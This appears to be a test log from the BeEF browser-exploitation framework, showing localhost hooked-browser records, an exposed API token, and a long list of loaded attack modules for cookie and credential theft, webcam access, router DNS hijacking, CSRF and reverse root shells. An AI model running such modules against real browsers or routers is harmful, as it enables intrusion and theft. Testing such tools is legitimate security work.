"name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823088", "lastseen"=>"1586823133", "date_stamp"=>"Tue Apr 14 2020 10:11:28 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "4"=>{"id"=>21, "session"=>"E3XCCLrCpMp0Hvq1FKbFyuCMA0GH6l8vjg2btjzNIBwbWbzsaVUuHCJ5HJriCa2YOM14wjuSfxXsqq2M", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823176", "lastseen"=>"1586823181", "date_stamp"=>"Tue Apr 14 2020 10:12:56 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "5"=>{"id"=>22, "session"=>"MjK3oK2VXh51kdtApZv3VFigB8JOv1O233r2XxSgefqNn2qQfEw4znfQXBrjKpmJrLhnCZZRqGSxU2SZ", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823759", "lastseen"=>"1586823767", "date_stamp"=>"Tue Apr 14 2020 10:22:39 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "6"=>{"id"=>23, "session"=>"Kurawnld1luO8DK8qcJFbo7v533MlfanGr76e9b1DEa2HcSDUzSnxfTVVrhUHeV0Mcx0ciLA2MZiyKEs", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823901", "lastseen"=>"1586823909", "date_stamp"=>"Tue Apr 14 2020 10:25:01 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "7"=>{"id"=>24, "session"=>"p1Q5TOCFVMuylZfBhksna1NvPR4a04Ad7QbPomb4PHRUacviwkOOPPMjKPPmUXzx0HeUfCcycJb2j3Sq", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586824045", "lastseen"=>"1586824055", "date_stamp"=>"Tue Apr 14 2020 10:27:25 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "8"=>{"id"=>25, "session"=>"3Kbgs99XkM5Am0f0gOfz2CGFoJG8n8i1T0TIKegBinXLUlkZlUDms9VVNlNxBHnQmFVwmYsrrzlekyR6", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586824655", "lastseen"=>"1586824660", "date_stamp"=>"Tue Apr 14 2020 10:37:35 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "9"=>{"id"=>26, "session"=>"bSelA6lviGwncwjYz5V94T7ro5Y0hccwiSG5BNlKEvKZAkCKtS9QJxqZHxRq0ftH4yscih8wS9Q6E7VC", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586824702", "lastseen"=>"1586824707", "date_stamp"=>"Tue Apr 14 2020 10:38:22 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "10"=>{"id"=>27, "session"=>"MukAOldO09rn7xS5l4wg4WwFGLSgfXBToe5Gg1D9YFYiqTv4v7nYApweeKcLyC2q2Umv28DvN4tIELb6", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586825120", "lastseen"=>"1586825125", "date_stamp"=>"Tue Apr 14 2020 10:45:20 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "11"=>{"id"=>28, "session"=>"SUBKyTPClGhHJnrm4y0SFaDSXhxCnwLoZKf4MbApBSyLTY0UclIdzZR4mPH8CajcevHVGRf6ab5lTBzv", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586825334", "lastseen"=>"1586825339", "date_stamp"=>"Tue Apr 14 2020 10:48:53 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "12"=>{"id"=>29, "session"=>"wnrdDzrnDFYUDMvtofqft63243mefwC4BSelGtLLjdDMiygmYiybwyw0fDDnsHxzKxjYRDw7XF5d90vD", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586825653", "lastseen"=>"1586825659", "date_stamp"=>"Tue Apr 14 2020 10:54:13 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "13"=>{"id"=>30, "session"=>"X0AOIAjGxN0jJGds4d8f7jYdkWs0EotnaygCnLv9KEkHga5O4vtQrOTi4CzzFX8ZNxFwnqrcfBlpNF7u", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586911812", "lastseen"=>"1586911817", "date_stamp"=>"Wed Apr 15 2020 10:50:12 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "14"=>{"id"=>31, "session"=>"NKaX3YSA62A6ag0yIr7QHBe4FmAnN7QgfupICVEwPUaDjWmHGxgbCAD4hdingsm27H82yvfr4CeOcw8I", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586915220", "lastseen"=>"1586915225", "date_stamp"=>"Wed Apr 15 2020 11:47:00 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "15"=>{"id"=>32, "session"=>"nKltmTSqFCmfCEitW5ZhI1fyahYvkEMsNSf6xdlSuCEtrebT5U6ineQXMn2cANPEFtDmVebCKMUNRse5", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586997085", "lastseen"=>"1586997090", "date_stamp"=>"Thu Apr 16 2020 10:31:25 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "16"=>{"id"=>34, "session"=>"2orczrZYqfGHQEX4DqVFrSd3n4ldHKyu5hoSxyxdWwrR1mc8HJWBIvADnbwz1aCMfbLjeIsi0rVNbunc", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586997178", "lastseen"=>"1586997183", "date_stamp"=>"Thu Apr 16 2020 10:32:58 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "17"=>{"id"=>35, "session"=>"HEfVx04GFlL4dtr5Hn5jOK4q8cXv6w3O6nSN384bWr3gREw6RAq98LtNEqKP5bn8RxbTUMjMFNsPNcaZ", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586999077", "lastseen"=>"1586999170", "date_stamp"=>"Thu Apr 16 2020 11:04:37 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "18"=>{"id"=>36, "session"=>"NIUDIFLnW5s8JJNPj1FESe5WdHWi8MUSRAjHnbp337EmMlrRpcIDsq7G3BOfvUfkHj3qi5O3j0WDZ8TT", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586999554", "lastseen"=>"1586999950", "date_stamp"=>"Thu Apr 16 2020 11:12:34 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "19"=>{"id"=>37, "session"=>"un0tmccB7WwpKRoh6PlTX5YvWu1quQRrA2YVbkUZ29DQJR9t9YmMGY34Jitnn26WQywfOKg9mDF9wezP", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002303", "lastseen"=>"1587002383", "date_stamp"=>"Thu Apr 16 2020 11:58:23 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "20"=>{"id"=>38, "session"=>"cfAKdPS9dBNfVUGq1eeuubMh1ckjUhCTbg4sO5GjEQcTM4V5ZWlXv5FOgDyNaKykKbpN8FCkg6A8G7x9", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002320", "lastseen"=>"1587002383", "date_stamp"=>"Thu Apr 16 2020 11:58:40 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "21"=>{"id"=>39, "session"=>"yxfETQTrCWmbcMCNkO4wgwuOBYnfkPwGuLnvwf784IhRkPsXcUNSC3oPHAej782H1OR2S9yrojBbXQOw", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002334", "lastseen"=>"1587002383", "date_stamp"=>"Thu Apr 16 2020 11:58:54 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "22"=>{"id"=>40, "session"=>"ha5u1TArsoPZ8p8C7RmFAjKJex4Vlzh2R3GZYf9LpFSTzkjyw0b6uWJnG8Qvz79rAEulkBMhExoFbAMv", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002344", "lastseen"=>"1587002384", "date_stamp"=>"Thu Apr 16 2020 11:59:04 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "23"=>{"id"=>41, "session"=>"skS153phY1gsP9Da2S5lDrY0DFrwwIoXGVRkAil8c2GqNhWnmWzoBY2bQqjbTxmAicheQj8mu8L09fR8", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002479", "lastseen"=>"1587002659", "date_stamp"=>"Thu Apr 16 2020 12:01:19 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "24"=>{"id"=>42, "session"=>"739cAcKvtPraU2nHcDxWPW56lWS43sZ7LHaSjhklK3Pyf8u6E8o6JM1qBec8NB4hcCAC5159mcb9z9IH", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002497", "lastseen"=>"1587002658", "date_stamp"=>"Thu Apr 16 2020 12:01:37 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "25"=>{"id"=>43, "session"=>"QCIw89A5OeTE5wmlljF62KCMZjfDBDTGew8mZbNw8ZNU2JtN5UHougr9uQeFB8gtcKJnVoxYtisGYHmt", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002503", "lastseen"=>"1587002658", "date_stamp"=>"Thu Apr 16 2020 12:01:43 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "26"=>{"id"=>44, "session"=>"zPD5TEGGQOpSN76j6o13TGj5ShgqAuu2U9uyZRtYtOAzsEWwDaW1lWYQVwn5eznNK5UXem6JCazh4y0M", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002654", "lastseen"=>"1587002659", "date_stamp"=>"Thu Apr 16 2020 12:04:14 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "27"=>{"id"=>45, "session"=>"5tNjGYE8iYLvs1SE1mjFnb2T7aGvsaK3q9dT8os6y1QlgVUAfC9N4BFaHcoJbOLs1eUtMycHMLBQGvO5", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002780", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:06:20 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "28"=>{"id"=>46, "session"=>"dyxGyhoOBJ5ofXGpfyMwW5cQltFxDFTtCNGAIktraEqCmjgLJ6ZhWIiLiIDl4ZzuyBxm07HegMZJizaC", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002832", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:07:12 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "29"=>{"id"=>47, "session"=>"9SYxDBsTxxm6ChrKA9x4uAv4hU09oM1cPDwn6Bk2hiwXRKzIRbqCJFsRkISVHll133KiskmUGTf568Uu", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002845", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:07:25 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "30"=>{"id"=>48, "session"=>"zzE0XoJYHt6FagYZCBJJYjfZVuRRuWSRK8bU5ighMkIrv0kOjSjoM3YbASTiCkqAaa8QWVBMdP0rXHGz", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002853", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:07:33 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "31"=>{"id"=>49, "session"=>"beX3j5CtbIHAm9wbyREPHbwmw5sbq4wbRG9zEPd4DcIcX58pqsv2Txbq7hiAEbYIXPb0ACRt9n3kOiFZ", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002920", "lastseen"=>"1587002925", "date_stamp"=>"Thu Apr 16 2020 12:08:40 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "32"=>{"id"=>50, "session"=>"D2eqzleYvJk00eqoiYqBX4PqECx75StryhNFssjvaGv5Shzj8ScIwoAttDtNwAYukI8T2H5I6uBW232z", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003771", "lastseen"=>"1587003843", "date_stamp"=>"Thu Apr 16 2020 12:22:51 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "33"=>{"id"=>51, "session"=>"UrBt1Owdt8BxUUT5BF2vDiG51jMMgOX4xwwuPXAKyw31jrNdjCvs6obIhGCW4sudl1wPzAxBRLukHi8S", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003785", "lastseen"=>"1587003843", "date_stamp"=>"Thu Apr 16 2020 12:23:05 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "34"=>{"id"=>52, "session"=>"e4GEegTS5ls8E2QWUEQvMYiiOIHs7W0UEZQopD2gCaaNg30FSNbf1aZBqYUtKaGrb1AieR0kwm7T9XIB", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003791", "lastseen"=>"1587003844", "date_stamp"=>"Thu Apr 16 2020 12:23:10 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "35"=>{"id"=>53, "session"=>"zq4ykhGFTls1b2CYvYFBiWXCldd9OFrCU2GejMtNdFq4VYMLeof6GINglFtS0i700VpmoHHCHyfCoMke", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003802", "lastseen"=>"1587003844", "date_stamp"=>"Thu Apr 16 2020 12:23:22 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}}}} - can successfully hook a browser -authenticated. api token: 0916b20132e5f6b405f404599ce44339f0128bfb -hooking a new victim, waiting a few seconds... - browser details handler working - -BeEF Modules - safe client debug log - safe variable decleration -[12:25:37][>] Soft Load module: 'internal_network_fingerprinting' -[12:25:37][>] Soft Load module: 'detect_burp' -[12:25:37][>] Soft Load module: 'get_http_servers' -[12:25:37][>] Soft Load module: 'detect_tor' -[12:25:37][>] Soft Load module: 'irc_nat_pinning' -[12:25:37][>] Soft Load module: 'get_ntop_network_hosts' -[12:25:37][>] Soft Load module: 'doser' -[12:25:37][>] Soft Load module: 'detect_soc_nets' -[12:25:37][>] Soft Load module: 'ping_sweep_ff' -[12:25:37][>] Soft Load module: 'cross_origin_scanner_cors' -[12:25:37][>] Soft Load module: 'dns_enumeration' -[12:25:37][>] Soft Load module: 'cross_origin_scanner_flash' -[12:25:37][>] Soft Load module: 'get_proxy_servers_wpad' -[12:25:37][>] Soft Load module: 'port_scanner' -[12:25:37][>] Soft Load module: 'fingerprint_routers' -[12:25:37][>] Soft Load module: 'ping_sweep' -[12:25:37][>] Soft Load module: 'f5_bigip_cookie_stealing' -[12:25:37][>] Soft Load module: 'f5_bigip_cookie_disclosure' -[12:25:37][>] Soft Load module: 'sw_port_scanner' -[12:25:37][>] Soft Load module: 'ping_sweep_java' -[12:25:37][>] Soft Load module: 'identify_lan_subnets' -[12:25:37][>] Soft Load module: 'dns_rebinding' -[12:25:37][>] Soft Load module: 'test_return_image' -[12:25:37][>] Soft Load module: 'test_network_request' -[12:25:37][>] Soft Load module: 'test_http_redirect' -[12:25:37][>] Soft Load module: 'test_return_ascii_chars' -[12:25:37][>] Soft Load module: 'test_dns_tunnel_client' -[12:25:37][>] Soft Load module: 'test_beef_debug' -[12:25:37][>] Soft Load module: 'test_get_variable' -[12:25:37][>] Soft Load module: 'test_return_long_string' -[12:25:37][>] Soft Load module: 'test_cors_request' -[12:25:37][>] Soft Load module: 'Detect_unity' -[12:25:37][>] Soft Load module: 'detect_office' -[12:25:37][>] Soft Load module: 'unhook' -[12:25:37][>] Soft Load module: 'avant_steal_history' -[12:25:37][>] Soft Load module: 'detect_wmp' -[12:25:37][>] Soft Load module: 'detect_vlc' -[12:25:37][>] Soft Load module: 'browser_fingerprinting' -[12:25:37][>] Soft Load module: 'webcam' -[12:25:37][>] Soft Load module: 'get_visited_domains' -[12:25:37][>] Soft Load module: 'detect_foxit' -[12:25:37][>] Soft Load module: 'Detect_toolbars' -[12:25:37][>] Soft Load module: 'detect_realplayer' -[12:25:37][>] Soft Load module: 'detect_quicktime' -[12:25:37][>] Soft Load module: 'get_visited_urls' -[12:25:37][>] Soft Load module: 'fingerprint_browser' -[12:25:37][>] Soft Load module: 'remove_hook_element' -[12:25:37][>] Soft Load module: 'detect_lastpass' -[12:25:37][>] Soft Load module: 'detect_simple_adblock' -[12:25:37][>] Soft Load module: 'webcam_html5' -[12:25:37][>] Soft Load module: 'get_page_html_iframe' -[12:25:37][>] Soft Load module: 'link_rewrite_sslstrip' -[12:25:37][>] Soft Load module: 'rickroll' -[12:25:37][>] Soft Load module: 'link_rewrite_click_events' -[12:25:37][>] Soft Load module: 'prompt_dialog' -[12:25:37][>] Soft Load module: 'get_form_values' -[12:25:37][>] Soft Load module: 'ajax_fingerprint' -[12:25:37][>] Soft Load module: 'deface_web_page_component' -[12:25:37][>] Soft Load module: 'mobilesafari_address_spoofing' -[12:25:37][>] Soft Load module: 'deface_web_page' -[12:25:37][>] Soft Load module: 'link_rewrite' -[12:25:37][>] Soft Load module: 'get_stored_credentials' -[12:25:37][>] Soft Load module: 'link_rewrite_tel' -[12:25:37][>] Soft Load module: 'remove_stuck_iframes' -[12:25:37][>] Soft Load module: 'get_cookie' -[12:25:37][>] Soft Load module: 'clear_console' -[12:25:37][>] Soft Load module: 'alert_dialog' -[12:25:37][>] Soft Load module: 'site_redirect' -[12:25:37][>] Soft Load module: 'site_redirect_iframe' -[12:25:37][>] Soft Load module: 'get_local_storage' -[12:25:37][>] Soft Load module: 'replace_video' -[12:25:37][>] Soft Load module: 'overflow_cookiejar' -[12:25:37][>] Soft Load module: 'get_page_html' -[12:25:37][>] Soft Load module: 'get_page_links' -[12:25:37][>] Soft Load module: 'get_session_storage' -[12:25:37][>] Soft Load module: 'disable_developer_tools' -[12:25:37][>] Soft Load module: 'detect_silverlight' -[12:25:37][>] Soft Load module: 'detect_mime_types' -[12:25:37][>] Soft Load module: 'webcam_permission_check' -[12:25:37][>] Soft Load module: 'detect_extensions' -[12:25:37][>] Soft Load module: 'detect_unsafe_activex' -[12:25:37][>] Soft Load module: 'detect_activex' -[12:25:37][>] Soft Load module: 'spyder_eye' -[12:25:37][>] Soft Load module: 'Play_sound' -[12:25:37][>] Soft Load module: 'detect_popup_blocker' -[12:25:37][>] Soft Load module: 'detect_evernote_clipper' -[12:25:37][>] Soft Load module: 'detect_firebug' -[12:25:37][>] Soft Load module: 'vtiger_crm_upload_exploit' -[12:25:37][>] Soft Load module: 'coldfusion_dir_traversal_exploit' -[12:25:37][>] Soft Load module: 'pfsense_2_3_2_reverse_root_shell_csrf' -[12:25:37][>] Soft Load module: 'pfsense_reverse_root_shell_csrf' -[12:25:37][>] Soft Load module: 'qnx_qconn_command_execution' -[12:25:37][>] Soft Load module: 'wanem_command_execution' -[12:25:37][>] Soft Load module: 'kemp_command_execution' -[12:25:37][>] Soft Load module: 'apache_felix_remote_shell' -[12:25:37][>] Soft Load module: 'opencart_reset_password' -[12:25:37][>] Soft Load module: 'spring_framework_malicious_jar' -[12:25:37][>] Soft Load module: 'wipg1000_cmd_injection' -[12:25:37][>] Soft Load module: 'planet_vdr300nu_adsl_dns_hijack' -[12:25:37][>] Soft Load module: 'utstarcom_wa3002g4_dns_hijack' -[12:25:37][>] Soft Load module: 'linksys_befsr41_csrf' -[12:25:37][>] Soft Load module: 'Huawei_smartax_mt880_csrf' -[12:25:37][>] Soft Load module: 'dlink_dsl2740r_dns_hijack' -[12:25:37][>] Soft Load module: 'telstra_zte_mf91_disable_ap_isolation' -[12:25:37][>] Soft Load module: 'dlink_dir_615_csrf' -[12:25:37][>] Soft Load module: 'exper_ewm01_adsl_dns_hijack' -[12:25:37][>] Soft Load module: 'comtrend_ct_series_dns_hijack' -[12:25:37][>] Soft Load module: 'ddwrt_v24_sp1_cmd_exec' -[12:25:37][>] Soft Load module: 'dlink_2640b_dns_hijack' -[12:25:37][>] Soft Load module: 'dlink_dsl526b_dns_hijack' -[12:25:37][>] Soft Load module: 'dlink_dsl500t_csrf' -[12:25:37][>] Soft Load module: 'asus_dslx11_dns_hijack' -[12:25:37][>] Soft Load module: 'shuttle_tech_915wm_dns_hijack' -[12:25:37][>] Soft Load module: 'philips_dns_hijack' -[12:25:37][>] Soft Load module: 'cisco_e2400_csrf' -[12:25:37][>] Soft Load module: 'comtrend_ct5367_csrf' -[12:25:37][>] Soft Load module: 'argw4_adsl_dns_hijack' -[12:25:37][>] Soft Load module: 'pikatel_96338_dns_hijack' -[12:25:37][>] Soft Load module: 'iball_baton_ib_wra150n_dns_hijack' -[12:25:37][>] Soft Load module: 'dlink_dsl2780b_dns_hijack' -[12:25:37][>] Soft Load module: 'inteno_eg101r1_voip_dns_hijack' -[12:25:37][>] Soft Load module: 'linksys_e2500_csrf' -[12:25:37][>] Soft Load module: 'actiontec_q1000_csrf' -[12:25:37][>] Soft Load module: 'com_officeconnect_cmd_exec' -[12:25:37][>] Soft Load module: 'linksys_e2500_dns_hijack' -[12:25:37][>] Soft Load module: 'asmax_ar804gu_cmd_exec' -[12:25:37][>] Soft Load module: 'virgin_superhub_csrf' -[12:25:37][>] Soft Load module: 'bt_home_hub_csrf' -[12:25:37][>] Soft Load module: 'linksys_e2500_shell' -[12:25:37][>] Soft Load module: 'beetel_bcm96338_router_dns_hijack' -[12:25:37][>] Soft Load module: 'Netgear_dgn_2000_wan_mgmt_csrf' -[12:25:37][>] Soft Load module: 'netgear_dgn2200_cmd_exec' -[12:25:37][>] Soft Load module: 'tplink_dns_csrf' -[12:25:37][>] Soft Load module: 'asus_rt_n66u_cmd_exec' -[12:25:37][>] Soft Load module: 'ddwrt_v24_sp1_csrf' -[12:25:37][>] Soft Load module: 'linksys_wrt54g2_csrf' 